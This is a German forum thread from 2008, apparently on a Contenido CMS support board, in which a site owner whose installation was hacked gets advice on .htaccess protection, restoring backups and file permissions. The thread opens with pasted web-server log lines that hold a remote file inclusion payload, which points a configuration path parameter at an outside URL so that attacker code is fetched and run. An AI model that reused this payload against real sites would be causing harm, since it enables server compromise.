89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
205.234.219.245 - - [08/Jun/2008:08:08:06 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:08 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
205.234.219.245 - - [08/Jun/2008:08:08:20 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:15:33:38 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:15:37:00 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
Verfasst: Di 10. Jun 2008, 11:11
von boeckers
HI Martin,
das sieht nach der alten Deep-link Attacke aus.
Lade dir evtl. einmal das conubo-HTA.lite für Contenido auf meiner Site
www.conubo.net herunter und starte das.
Der Download ist kostenlos.
Das legt .htaccess Dateien an und damit wird versucht solche deep-link Attacken zu verhindern.
Gerade zum Schutz älterer Installationen ist das oft ganz hilfreich.
Gruss
boeckers
Verfasst: Di 10. Jun 2008, 11:11
von Martin S.
Dann habe ich noch einen Log-Eintrag mit dem permanenten Aufruf einer JS-Datei gesehen
cms/js/jsApi.js
Die gehört doch nicht zum Standard des Systems oder?!
Und müssen denn eigentlich die ganzen Verzeichnisse auf 777 stehen oder kann ich das auch einschränken? Wenn ich das gemacht habe und die Backups wieder drüber, werden ich anschließend die htaccess Dateien mal drüber bügeln. Dank euch, falls ihr noch Tipps habt, gerne.
Verfasst: Di 10. Jun 2008, 11:47
von tono
Du solltest dieses subforum genau studieren, da gibt es noch viele Hinweise und Tipps.
Ob die Verzeichnisse auf 777 stehen müssen oder nicht hängt stark vom System ab. Einfach ausprobieren in diesem Fall ist ja weniger mehr!
Verfasst: Di 10. Jun 2008, 12:04
von Dodger77
Martin S. hat geschrieben:Dann habe ich noch einen Log-Eintrag mit dem permanenten Aufruf einer JS-Datei gesehen
cms/js/jsApi.js
Die gehört doch nicht zum Standard des Systems oder?!
Nein, die wird allerdings im Standard-Layout aufgerufen. Diesen Aufruf kann man einfach entfernen aus dem HTML. Das wird wohl nichts mit dem Hack zu tun haben.
Verfasst: Di 10. Jun 2008, 12:10
von Martin S.
Achja stimmt, jetzt erinnere ich mich, dann wirds das js wohl nicht gewesen sein. Jedenfalls spielt mir der Provider die alten Backups wieder ein und anschließen werde ich die HTA-Geschichte drüber laufen lassen, hoffe dann ist das gröbste gestopft, dank euch.
Verfasst: Di 10. Jun 2008, 12:36
von Dodger77
Martin S. hat geschrieben:..., hoffe dann ist das gröbste gestopft, ...
Wichtig ist, dass man mal die Backups und den derzeitigen Stand miteinander vergleich (z.B. mit Winmerge), um herauszufinden, woran es nun wirklich lag. Die Angriffsversuche in den Logfiles oben sollten in Contenido-Versionen ab 4.6.8 eigentlich nicht erfolgreich sein.
Verfasst: Di 10. Jun 2008, 12:48
von Martin S.
Danke für den Hinweis, aber ich kann nichts vergleichen, weil die Dateien alle wieder eigenständig gelöscht wurden, ich habe nur leere Verzeichnisse als resultat.
cms/
cache
css
js
logs
templates
upload
contenido/
cronjobs
logs
sonst sehe ich nichts und die Logfiles sagen auch nicht so wirklich viel aus, oder zumindest kapiere ich die Einträge nicht wirklich.
Ach ja und die Versionen gingen wie schon oben beschrieben von der 4.6.8 bis zur 4.8.2.